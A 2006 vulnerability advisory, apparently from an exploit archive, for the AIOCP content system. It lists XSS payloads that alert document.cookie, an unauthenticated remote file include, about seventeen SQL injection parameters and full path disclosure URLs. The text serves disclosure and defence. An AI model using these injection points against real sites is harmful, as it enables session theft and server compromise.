aiocp13007.txt

aiocp13007.txt: Posted Nov 7, 2006; Authored by benjamin moss, laurent gaffie | Site s-a-p.ca; AIOCP versions 1.3.007 and below suffer from SQL injection, remote file inclusion, and cross site scripting vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection, file inclusion; SHA-256 | 31f2b53b6bb1d1c42c85a9b5019719701d9ad6460728139ad5e0d99e0c3d5ce1; Download | Favorite | View

aiocp13007.txt

AIOCP <=1.3.007 multiples vulnerabilities[injection sql , remote file include , xss] 

XSS get =
- /public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_dpage.php?choosed_language=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_show_ec_products.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_users_online.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_links_search.php?orderdir=</textarea>'"><script>alert(document.cookie)</script>

xss post in user profile :
- signature
- fiscal code

remote file include =
/admin/code/index.php?load_page=http%3A//google.com
( no login needed for the remote file include ) 

sql injection =
- /public/code/cp_dpage.php?choosed_language=[sql]
- /public/code/cp_news.php?choosed_language=[sql]
- /public/code/cp_news.php?news_category=[sql]
- /public/code/cp_forum_view.php?choosed_language=[sql]
- /public/code/cp_edit_user.php?choosed_language=[sql]
- /public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
- /public/code/cp_newsletter.php?choosed_language=[sql]
- /public/code/cp_links.php?links_category=[sql]
- /public/code/cp_links.php?choosed_language=[sql]
- /public/code/cp_contact_us.php?choosed_language=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?order_field=[sql]
- /public/code/cp_login.php?choosed_language=[sql]
- /public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
- /public/code/cp_codice_fiscale.php?choosed_language=[sql]
- /public/code/cp_links_search.php?orderdir=[sql]


full path disclosure =
- /public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
- /public/code/cp_show_ec_products.php?order_field[]=
- /public/code/cp_show_page_help.php?hp[]=

global risk = hight

laurent gaffié & benjamin mossé
https://s-a-p.ca/
saps.audit@gmail.com

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

aiocp13007.txt

aiocp13007.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

aiocp13007.txt

Share This

aiocp13007.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems